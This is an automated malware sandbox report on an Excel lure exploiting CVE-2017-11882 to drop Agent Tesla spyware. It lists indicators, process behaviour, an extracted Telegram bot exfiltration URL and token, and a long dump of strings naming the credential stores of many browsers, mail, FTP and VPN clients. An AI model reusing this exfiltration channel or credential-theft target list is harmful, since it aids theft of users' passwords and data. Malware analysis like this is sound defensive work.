analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SOA # 87594094.xlsx

Full analysis: https://app.any.run/tasks/ab5505cd-0894-4c52-8aae-b91543a0c107
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: May 21, 2022, 10:45:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
encrypted
exploit
CVE-2017-11882
loader
agenttesla
Indicators:
MIME: application/encrypted
File info: CDFV2 Encrypted
MD5:

00D8CBAA1A4EB56066DAE9E213BC9503

SHA1:

01AA1FB71E86714F6CBA7F17B5E80AD707583E66

SHA256:

F8FE8C2F2BACB1BD5B18725526E4212A035085B22B7170C0A19F4FD40FD6FA10

SSDEEP:

6144:+kNXdLE8NZgjlEXqUjQ3txDmpfd69UeA2avPc0eR:+iG5EaUjMthE69UeQvPc0m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops executable file immediately after starts

      • EQNEDT32.EXE (PID: 1808)
    • Application was dropped or rewritten from another process

      • vbc.exe (PID: 2632)
      • vbc.exe (PID: 556)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1808)
    • Steals credentials from Web Browsers

      • vbc.exe (PID: 556)
    • Actions looks like stealing of personal data

      • vbc.exe (PID: 556)
    • AGENTTESLA detected by memory dumps

      • vbc.exe (PID: 556)
  • SUSPICIOUS

    • Checks supported languages

      • EQNEDT32.EXE (PID: 1808)
      • vbc.exe (PID: 556)
      • vbc.exe (PID: 2632)
    • Reads the computer name

      • EQNEDT32.EXE (PID: 1808)
      • vbc.exe (PID: 2632)
      • vbc.exe (PID: 556)
    • Executed via COM

      • EQNEDT32.EXE (PID: 1808)
    • Drops a file with a compile date too recent

      • EQNEDT32.EXE (PID: 1808)
    • Executable content was dropped or overwritten

      • EQNEDT32.EXE (PID: 1808)
    • Application launched itself

      • vbc.exe (PID: 2632)
    • Reads Environment values

      • vbc.exe (PID: 556)
    • Creates files in the user directory

      • vbc.exe (PID: 556)
    • Reads the cookies of Google Chrome

      • vbc.exe (PID: 556)
    • Reads the cookies of Mozilla Firefox

      • vbc.exe (PID: 556)
  • INFO

    • Checks supported languages

      • EXCEL.EXE (PID: 1040)
    • Reads the computer name

      • EXCEL.EXE (PID: 1040)
    • Reads settings of System Certificates

      • vbc.exe (PID: 556)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1040)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(556) vbc.exe
Protocoltelegram
Urlhttps://api.telegram.org/bot5368056296:AAHgHHTnRAZx9eL5AZ1arY8hwWaEJUMdR18/sendDocument
ChatId5320801953
Strings (773)
:
<font color="#00b1ba"><b>[
</b>
<b>]</b> <font color="#000000">(
MM/dd/yyyy HH:mm:ss
)</font></font>
False
<font color="#00ba66">{BACK}</font>
</font>
<font color="#00ba66">{ALT+TAB}</font>
<font color="#00ba66">{ALT+F4}</font>
<font color="#00ba66">{TAB}</font>
<font color="#00ba66">{ESC}</font>
<font color="#00ba66">{Win}</font>
<font color="#00ba66">{CAPSLOCK}</font>
<font color="#00ba66">&uarr;</font>
<font color="#00ba66">&darr;</font>
<font color="#00ba66">&larr;</font>
<font color="#00ba66">&rarr;</font>
<font color="#00ba66">{DEL}</font>
<font color="#00ba66">{END}</font>
<font color="#00ba66">{HOME}</font>
<font color="#00ba66">{Insert}</font>
<font color="#00ba66">{NumLock}</font>
<font color="#00ba66">{PageDown}</font>
<font color="#00ba66">{PageUp}</font>
<font color="#00ba66">{ENTER}</font>
<font color="#00ba66">{F1}</font>
<font color="#00ba66">{F2}</font>
<font color="#00ba66">{F3}</font>
<font color="#00ba66">{F4}</font>
<font color="#00ba66">{F5}</font>
<font color="#00ba66">{F6}</font>
<font color="#00ba66">{F7}</font>
<font color="#00ba66">{F8}</font>
<font color="#00ba66">{F9}</font>
<font color="#00ba66">{F10}</font>
<font color="#00ba66">{F11}</font>
<font color="#00ba66">{F12}</font>
control
<font color="#00ba66">{CTRL}</font>
&
&amp;
<
&lt;
>
&gt;
"
&quot;
Copied Text:
The binary key cannot have an odd number of digits: {0}
Index must be from {0} to {1}.
:Zone.Identifier
SystemDrive
\
WScript.Shell
RegRead
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
AES
Microsoft Primitive Provider
CONNECTION
KEEP-ALIVE
PROXY-AUTHENTICATE
PROXY-AUTHORIZATION
TE
TRAILER
TRANSFER-ENCODING
UPGRADE
g
401
502
500
-
Windows RDP
credential
policy
blob
rdg
chrome
{{{0}}}
Length
CopyTo
ComputeHash
sha512
Copy
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
20
yyyy-MM-dd HH:mm:ss
yyyy_MM_dd_HH_mm_ss
<br>
<hr>
https://api.ipify.org%
%startupfolder%
\%insfolder%\%insname%
/
http://vewZkS.com
\FSW
\%insfolder%\
Software\Microsoft\Windows\CurrentVersion\Run
%insregname%
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
SC
SC_
_
.jpeg
yyyy-MM-dd hh-mm-ss
Screenshot
image/jpeg
/log.tmp
KL
KL_
.html
<html>
</html>
Log
text/html
[
]
,
URL:
Username:
Password:
Application:
PW
PW_
CO
CO_
.zip
Cookie
application/zip
%urlkey%
-f
\Data\Tor\torrc
p=
%PostURL%
127.0.0.1
POST
+
%2B
application/x-www-form-urlencoded
%mailaddres%
%password%
%smtp%
%toemail%
image/jpg
%ftphost%/
%ftpuser%
%ftppassword%
STOR
Write
Close
Add
chat_id
5320801953
caption
https://api.telegram.org/bot5368056296:AAHgHHTnRAZx9eL5AZ1arY8hwWaEJUMdR18/sendDocument
document
---------------------------
x
--
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}" {1}
Content-Disposition: form-data; name="{0}"; filename="{1}" Content-Type: {2}
--
Time:
User Name:
Computer Name:
OSFullName:
CPU:
RAM:
IP Address:
New
Recovered!
User Name
OSFullName
None
win32_processor
processorID
6bb2e63f-49b8-4d13-8447-6e6f050bab7f
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
:
96642d83-a7c4-4a54-ba7c-6a38186da586
WinMgmts:
InstancesOf
Win32_BaseBoard
SerialNumber
11584b46-7b47-4d6c-9796-2e27994b178e
x2
Tor
AUTHENTICATE "%torpass%"
SIGNAL NEWNYM
250
tor
StartInfo
FileName
\Tor\tor.exe
Arguments
UseShellExecute
RedirectStandardOutput
CreateNoWindow
Start
StandardOutput
ReadLine
Contains
Bootstrapped 100%
EndOfStream
Id
AvoidDiskWrites 1 Log notice stdout DormantCanceledByStartup 1 ControlPort 9051 CookieAuthentication 1 runasdaemon 1 ExtORPort auto hashedcontrolpassword %hash% DataDirectory %tordir%\Data\Tor GeoIPFile %tordir%\Data\Tor\geoip GeoIPv6File %tordir%\Data\Tor\geoip6
\tor.zip
%tordir%
%hash%
%torpass%
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
https://www.theonionrouter.com/dist.torproject.org/torbrowser/
<a.+?href\s*=\s*(["'])(?<href>.+?)\1[^>]*>
href
Replace
TrimStart
.
TrimEnd
tor-win32-
GetBytes
TransformBlock
TransformFinalBlock
Hash
16:
GET
OK
\tmpG
.tmp
SELECT * FROM Win32_Processor
Name
MB
Unknown
Wr
W
C
ExtractFile
n
http://127.0.0.1:
HTTP/1.1
Hostname
Port
200 Connection established Proxy-Agent: HToS5x
Connect
Host
PathAndQuery
Fragment
Host:
{0}
Key
Mode
IV
Padding
CreateDecryptor
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
}
sha256
Cookies
Opera
Opera Software\Opera Stable
Comodo Dragon
Comodo\Dragon\User Data
Chrome
\Google\Chrome\User Data
360 Browser
\360Chrome\Chrome\User Data
Yandex
Yandex\YandexBrowser\User Data
SRWare Iron
Chromium\User Data
Torch Browser
Torch\User Data
Brave Browser
BraveSoftware\Brave-Browser\User Data
Iridium Browser
\Iridium\User Data
CoolNovo
MapleStudio\ChromePlus\User Data
7Star
7Star\7Star\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
Amigo
Amigo\User Data
CentBrowser
CentBrowser\User Data
CocCoc
CocCoc\Browser\User Data
Chedot
Chedot\User Data
Elements Browser
Elements Browser\User Data
Kometa
Kometa\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Citrio
CatalinaGroup\Citrio\User Data
Coowon
Coowon\Coowon\User Data
Liebao Browser
liebao\User Data
QIP Surf
QIP Surf\User Data
QQ Browser
Tencent\QQBrowser\User Data
UC Browser
UCBrowser\
Orbitum
Orbitum\User Data
Sputnik
Sputnik\Sputnik\User Data
uCozMedia
uCozMedia\Uran\User Data
Vivaldi
Vivaldi\User Data
cookies.sqlite
Firefox
APPDATA
\Mozilla\Firefox\
IceCat
\Mozilla\icecat\
PaleMoon
\Moonchild Productions\Pale Moon\
SeaMonkey
\Mozilla\SeaMonkey\
Flock
\Flock\Browser\
K-Meleon
\K-Meleon\
Postbox
\Postbox\
Thunderbird
\Thunderbird\
IceDragon
\Comodo\IceDragon\
WaterFox
\Waterfox\
BlackHawk
\NETGATE Technologies\BlackHawk\
CyberFox
\8pecxstudios\Cyberfox\
Path=([A-z0-9\/\.\-]+)
profiles.ini
\Default\
Profile
origin_url
username_value
password_value
v10
v11
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Default\Login Data
\Login Data
Opera Browser
Yandex Browser
Iridium\User Data
Chromium
Cool Novo
Brave
360Chrome\Chrome\User Data
Uran
Epic Privacy
Coccoc
\Google\Chrome\User Data\
logins
Major
Minor
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
IE/Edge
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
*
Login Data
journal
wow_logins
\Microsoft\Edge\User Data
Edge Chromium
\Microsoft\Credentials\
\Microsoft\Protect\
GuidMasterKey
\Default\EncryptedStorage
\EncryptedStorage
entries
category
Password
str3
str2
blob0
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
EmailAddress
SmtpServer
incredimail
HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine
current
Settings
SavePasswordText
ReturnAddress
Eudora
\falkon\profiles\
startProfile="([A-z0-9\/\.]+)"
\browsedata.db
autofill
Falkon Browser
startProfile=([A-z0-9\/\.]+)
Backend=([A-z0-9\/\.-]+)
\settings.ini
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
use_master_passphrase=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
ClawsMail
signons3.txt
---
.
objects
Data
DecryptTripleDes
Flock Browser
ALLUSERSPROFILE
\\
DynDNS\Updater\config.dyndns
username=
=
password=
&H
t6KzXhCh
http://DynDns.com
DynDNS
name
jid
password
Psi/Psi+
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
username
auth-data
entropy
Open VPN
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
FileZilla
SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
HostName
UserName
PublicKeyFile
PortNumber
22
[PRIVATE KEY LOCATION: "{0}"]
WinSCP
IP=
port=
user=
pass=
FlashFXP
SOFTWARE\FTPWare\COREFTP\Sites
CoreFTP
User
\FTP Navigator\Ftplist.txt
Server
No Password
FTP Navigator
Programfiles(x86)
programfiles
\jDownloader\config\database.script
programfiles(x86)
INSERT INTO CONFIG VALUES('AccountController','
sq
t
xt
JDownloader
Software\Paltalk
HKEY_CURRENT_USER\Software\Paltalk\
pwd
Paltalk
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\SmartFTP\Client 2.0\Favorites\Quick Connect\
\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
<Password>
</Password>
<Name>
</Name>
SmartFTP
appdata
\Ipswitch\WS_FTP\Sites\ws_ftp.ini
HOST
UID
PWD
WS_FTP
\cftp\Ftplist.txt
;Server=
;Port=
;Password=
;User=
;Anonymous=
Name=
FTPCommander
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
FTPGetter
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC
HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
USERname
NO-IP
\The Bat!
\Account.CFN
zzz
TheBat
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
SMTPServer
MailAddress
PassWd
Becky!
\Trillian\users\global\accounts.dat
Accounts
Trillian
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
IMAP Password
POP3 Password
HTTP Password
SMTP Password
SMTP Server
Outlook
COMPlus_legacyCorruptedStateExceptionsPolicy
1
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
Windows Mail App
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\mail\
\VirtualStore\Program Files\Foxmail\mail\
\VirtualStore\Program Files (x86)\Foxmail\mail\
\Accounts\Account.rec0
\Account.stg
Read
Dispose
POP3Host
SMTPHost
IncomingServer
POP3Password
Foxmail
\Opera Mail\Opera Mail\wand.dat
opera:
Opera Mail
\Pocomail\accounts.ini
POPPass
SMTPPass
SMTP
PocoMail
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
SOFTWARE\RealVNC\WinVNC4
Software\ORL\WinVNC3
TightVNC
Software\TightVNC\Server
PasswordViewOnly
TightVNC ControlPassword
ControlPassword
TigerVNC
Software\TigerVNC\Server
Trim
UltraVNC
ProgramFiles(x86)
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
Substring
eM Client\accounts.dat
eM Client
"Username":"
",
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
\Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
Mailbird
SenderIdentities
NordVPN
NordVPN directory not found!
NordVpn.exe*
user.config
Load
SelectSingleNode
//setting[@name='Username']/value
InnerText
//setting[@name='Password']/value
\MySQL\Workbench\workbench_user_data.dat


MySQL Workbench
%ProgramW6432%
Private Internet Access\data
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
Private Internet Access
Software\DownloadManager\Passwords\
EncPassword
Internet Download Manager
hdfzpysvpzimorhk
quick.dat
Sites.dat
\FlashFXP\
yA36zA48dEhfrvghGRg57h5UlDv3
Type
Value
IterationCount
\Psi\profiles
\Psi+\profiles
\accounts.xml
USERPROFILE
\OpenVPN\config\
remote
PWD=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
5A
71
abcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
o6806642kbM7c5
<array>
<dict>
<string>
</string>
<data>
</data>
Safari Browser
-convert xml1 -s -o "
\fixed_keychain.xml"
A
10
B
11
12
D
13
E
14
F
15
ABCDEF
(
EndsWith
)
IndexOf
UNIQUE
table
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
key4.db
metaData
id
item1
item2
nssPrivate
a11
a102
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
[^\u0020-\u007F]
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
;
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs eqnedt32.exe vbc.exe no specs #AGENTTESLA vbc.exe

Process information

PID
CMD
Path
Indicators
Parent process
1040"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
1808"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2632"C:\Users\Public\vbc.exe" C:\Users\Public\vbc.exeEQNEDT32.EXE
User:
admin
Integrity Level:
MEDIUM
Description:
TFlow
Exit code:
0
Version:
2.3.0.0
556"C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe
vbc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
TFlow
Version:
2.3.0.0
AgentTesla
(PID) Process(556) vbc.exe
Protocoltelegram
Urlhttps://api.telegram.org/bot5368056296:AAHgHHTnRAZx9eL5AZ1arY8hwWaEJUMdR18/sendDocument
ChatId5320801953
Strings (773)
:
<font color="#00b1ba"><b>[
</b>
<b>]</b> <font color="#000000">(
MM/dd/yyyy HH:mm:ss
)</font></font>
False
<font color="#00ba66">{BACK}</font>
</font>
<font color="#00ba66">{ALT+TAB}</font>
<font color="#00ba66">{ALT+F4}</font>
<font color="#00ba66">{TAB}</font>
<font color="#00ba66">{ESC}</font>
<font color="#00ba66">{Win}</font>
<font color="#00ba66">{CAPSLOCK}</font>
<font color="#00ba66">&uarr;</font>
<font color="#00ba66">&darr;</font>
<font color="#00ba66">&larr;</font>
<font color="#00ba66">&rarr;</font>
<font color="#00ba66">{DEL}</font>
<font color="#00ba66">{END}</font>
<font color="#00ba66">{HOME}</font>
<font color="#00ba66">{Insert}</font>
<font color="#00ba66">{NumLock}</font>
<font color="#00ba66">{PageDown}</font>
<font color="#00ba66">{PageUp}</font>
<font color="#00ba66">{ENTER}</font>
<font color="#00ba66">{F1}</font>
<font color="#00ba66">{F2}</font>
<font color="#00ba66">{F3}</font>
<font color="#00ba66">{F4}</font>
<font color="#00ba66">{F5}</font>
<font color="#00ba66">{F6}</font>
<font color="#00ba66">{F7}</font>
<font color="#00ba66">{F8}</font>
<font color="#00ba66">{F9}</font>
<font color="#00ba66">{F10}</font>
<font color="#00ba66">{F11}</font>
<font color="#00ba66">{F12}</font>
control
<font color="#00ba66">{CTRL}</font>
&
&amp;
<
&lt;
>
&gt;
"
&quot;
Copied Text:
The binary key cannot have an odd number of digits: {0}
Index must be from {0} to {1}.
:Zone.Identifier
SystemDrive
\
WScript.Shell
RegRead
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
AES
Microsoft Primitive Provider
CONNECTION
KEEP-ALIVE
PROXY-AUTHENTICATE
PROXY-AUTHORIZATION
TE
TRAILER
TRANSFER-ENCODING
UPGRADE
g
401
502
500
-
Windows RDP
credential
policy
blob
rdg
chrome
{{{0}}}
Length
CopyTo
ComputeHash
sha512
Copy
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
20
yyyy-MM-dd HH:mm:ss
yyyy_MM_dd_HH_mm_ss
<br>
<hr>
https://api.ipify.org%
%startupfolder%
\%insfolder%\%insname%
/
http://vewZkS.com
\FSW
\%insfolder%\
Software\Microsoft\Windows\CurrentVersion\Run
%insregname%
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
SC
SC_
_
.jpeg
yyyy-MM-dd hh-mm-ss
Screenshot
image/jpeg
/log.tmp
KL
KL_
.html
<html>
</html>
Log
text/html
[
]
,
URL:
Username:
Password:
Application:
PW
PW_
CO
CO_
.zip
Cookie
application/zip
%urlkey%
-f
\Data\Tor\torrc
p=
%PostURL%
127.0.0.1
POST
+
%2B
application/x-www-form-urlencoded
%mailaddres%
%password%
%smtp%
%toemail%
image/jpg
%ftphost%/
%ftpuser%
%ftppassword%
STOR
Write
Close
Add
chat_id
5320801953
caption
https://api.telegram.org/bot5368056296:AAHgHHTnRAZx9eL5AZ1arY8hwWaEJUMdR18/sendDocument
document
---------------------------
x
--
multipart/form-data; boundary=
Content-Disposition: form-data; name="{0}" {1}
Content-Disposition: form-data; name="{0}"; filename="{1}" Content-Type: {2}
--
Time:
User Name:
Computer Name:
OSFullName:
CPU:
RAM:
IP Address:
New
Recovered!
User Name
OSFullName
None
win32_processor
processorID
6bb2e63f-49b8-4d13-8447-6e6f050bab7f
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
:
96642d83-a7c4-4a54-ba7c-6a38186da586
WinMgmts:
InstancesOf
Win32_BaseBoard
SerialNumber
11584b46-7b47-4d6c-9796-2e27994b178e
x2
Tor
AUTHENTICATE "%torpass%"
SIGNAL NEWNYM
250
tor
StartInfo
FileName
\Tor\tor.exe
Arguments
UseShellExecute
RedirectStandardOutput
CreateNoWindow
Start
StandardOutput
ReadLine
Contains
Bootstrapped 100%
EndOfStream
Id
AvoidDiskWrites 1 Log notice stdout DormantCanceledByStartup 1 ControlPort 9051 CookieAuthentication 1 runasdaemon 1 ExtORPort auto hashedcontrolpassword %hash% DataDirectory %tordir%\Data\Tor GeoIPFile %tordir%\Data\Tor\geoip GeoIPv6File %tordir%\Data\Tor\geoip6
\tor.zip
%tordir%
%hash%
%torpass%
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
https://www.theonionrouter.com/dist.torproject.org/torbrowser/
<a.+?href\s*=\s*(["'])(?<href>.+?)\1[^>]*>
href
Replace
TrimStart
.
TrimEnd
tor-win32-
GetBytes
TransformBlock
TransformFinalBlock
Hash
16:
GET
OK
\tmpG
.tmp
SELECT * FROM Win32_Processor
Name
MB
Unknown
Wr
W
C
ExtractFile
n
http://127.0.0.1:
HTTP/1.1
Hostname
Port
200 Connection established Proxy-Agent: HToS5x
Connect
Host
PathAndQuery
Fragment
Host:
{0}
Key
Mode
IV
Padding
CreateDecryptor
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
}
sha256
Cookies
Opera
Opera Software\Opera Stable
Comodo Dragon
Comodo\Dragon\User Data
Chrome
\Google\Chrome\User Data
360 Browser
\360Chrome\Chrome\User Data
Yandex
Yandex\YandexBrowser\User Data
SRWare Iron
Chromium\User Data
Torch Browser
Torch\User Data
Brave Browser
BraveSoftware\Brave-Browser\User Data
Iridium Browser
\Iridium\User Data
CoolNovo
MapleStudio\ChromePlus\User Data
7Star
7Star\7Star\User Data
Epic Privacy Browser
Epic Privacy Browser\User Data
Amigo
Amigo\User Data
CentBrowser
CentBrowser\User Data
CocCoc
CocCoc\Browser\User Data
Chedot
Chedot\User Data
Elements Browser
Elements Browser\User Data
Kometa
Kometa\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Citrio
CatalinaGroup\Citrio\User Data
Coowon
Coowon\Coowon\User Data
Liebao Browser
liebao\User Data
QIP Surf
QIP Surf\User Data
QQ Browser
Tencent\QQBrowser\User Data
UC Browser
UCBrowser\
Orbitum
Orbitum\User Data
Sputnik
Sputnik\Sputnik\User Data
uCozMedia
uCozMedia\Uran\User Data
Vivaldi
Vivaldi\User Data
cookies.sqlite
Firefox
APPDATA
\Mozilla\Firefox\
IceCat
\Mozilla\icecat\
PaleMoon
\Moonchild Productions\Pale Moon\
SeaMonkey
\Mozilla\SeaMonkey\
Flock
\Flock\Browser\
K-Meleon
\K-Meleon\
Postbox
\Postbox\
Thunderbird
\Thunderbird\
IceDragon
\Comodo\IceDragon\
WaterFox
\Waterfox\
BlackHawk
\NETGATE Technologies\BlackHawk\
CyberFox
\8pecxstudios\Cyberfox\
Path=([A-z0-9\/\.\-]+)
profiles.ini
\Default\
Profile
origin_url
username_value
password_value
v10
v11
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Default\Login Data
\Login Data
Opera Browser
Yandex Browser
Iridium\User Data
Chromium
Cool Novo
Brave
360Chrome\Chrome\User Data
Uran
Epic Privacy
Coccoc
\Google\Chrome\User Data\
logins
Major
Minor
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
IE/Edge
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
*
Login Data
journal
wow_logins
\Microsoft\Edge\User Data
Edge Chromium
\Microsoft\Credentials\
\Microsoft\Protect\
GuidMasterKey
\Default\EncryptedStorage
\EncryptedStorage
entries
category
Password
str3
str2
blob0
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
EmailAddress
SmtpServer
incredimail
HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine
current
Settings
SavePasswordText
ReturnAddress
Eudora
\falkon\profiles\
startProfile="([A-z0-9\/\.]+)"
\browsedata.db
autofill
Falkon Browser
startProfile=([A-z0-9\/\.]+)
Backend=([A-z0-9\/\.-]+)
\settings.ini
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
use_master_passphrase=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
ClawsMail
signons3.txt
---
.
objects
Data
DecryptTripleDes
Flock Browser
ALLUSERSPROFILE
\\
DynDNS\Updater\config.dyndns
username=
=
password=
&H
t6KzXhCh
http://DynDns.com
DynDNS
name
jid
password
Psi/Psi+
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
username
auth-data
entropy
Open VPN
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
FileZilla
SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
HostName
UserName
PublicKeyFile
PortNumber
22
[PRIVATE KEY LOCATION: "{0}"]
WinSCP
IP=
port=
user=
pass=
FlashFXP
SOFTWARE\FTPWare\COREFTP\Sites
CoreFTP
User
\FTP Navigator\Ftplist.txt
Server
No Password
FTP Navigator
Programfiles(x86)
programfiles
\jDownloader\config\database.script
programfiles(x86)
INSERT INTO CONFIG VALUES('AccountController','
sq
t
xt
JDownloader
Software\Paltalk
HKEY_CURRENT_USER\Software\Paltalk\
pwd
Paltalk
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\SmartFTP\Client 2.0\Favorites\Quick Connect\
\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml
<Password>
</Password>
<Name>
</Name>
SmartFTP
appdata
\Ipswitch\WS_FTP\Sites\ws_ftp.ini
HOST
UID
PWD
WS_FTP
\cftp\Ftplist.txt
;Server=
;Port=
;Password=
;User=
;Anonymous=
Name=
FTPCommander
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
FTPGetter
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC
HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
USERname
NO-IP
\The Bat!
\Account.CFN
zzz
TheBat
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
SMTPServer
MailAddress
PassWd
Becky!
\Trillian\users\global\accounts.dat
Accounts
